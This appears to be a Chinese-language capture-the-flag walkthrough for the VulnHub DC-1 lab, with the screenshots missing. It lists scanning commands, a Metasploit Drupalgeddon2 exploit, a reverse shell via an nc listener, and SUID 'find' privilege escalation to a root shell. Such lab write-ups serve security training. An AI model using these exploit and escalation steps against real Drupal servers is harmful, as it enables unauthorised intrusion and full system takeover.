vulnhub DC-1靶场

1.扫描主机

sudo arp-scan -l

图片[1] - vulnhub DC-1靶场 - MaxSSL

扫描端口

nmap -p- 192.168.42.147

图片[2] - vulnhub DC-1靶场 - MaxSSL

扫描主机指纹,发现Drupal 7 cms

图片[3] - vulnhub DC-1靶场 - MaxSSL

2.得到shell(2.1,2.2)只用一种即可2.1开始msf漏洞利用

mfconsole

图片[4] - vulnhub DC-1靶场 - MaxSSL

search drupal

search 7600

use exploit/unix/webapp/drupal_drupalgeddon2

图片[5] - vulnhub DC-1靶场 - MaxSSL

set rhosts 192.168.42.147

run

图片[6] - vulnhub DC-1靶场 - MaxSSL

2.2脚本exp得到反弹shell

找到脚本,修改脚本,执行脚本

图片[7] - vulnhub DC-1靶场 - MaxSSL

图片[8] - vulnhub DC-1靶场 - MaxSSL

图片[9] - vulnhub DC-1靶场 - MaxSSL

nc 监听 8888 端口 得到反弹shell

python -c "import pty;pty.spawn('/bin/bash')" 美化一下

图片[10] - vulnhub DC-1靶场 - MaxSSL

3.mete图片[10] - vulnhub DC-1靶场 - MaxSSLpreter> 看到这个,说明成功拿下shell

shell

python -c "import pty;pty.spawn('/bin/bash')" 美化一下

图片[12] - vulnhub DC-1靶场 - MaxSSL

4.开始提权

find / -perm -u=s -type f 2>/dev/null

图片[13] - vulnhub DC-1靶场 - MaxSSL

发现/usr/bin/find,利用提权

find . -exec /bin/sh \;

图片[14] - vulnhub DC-1靶场 - MaxSSL

成功提权,寻找flag

图片[15] - vulnhub DC-1靶场 - MaxSSL

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享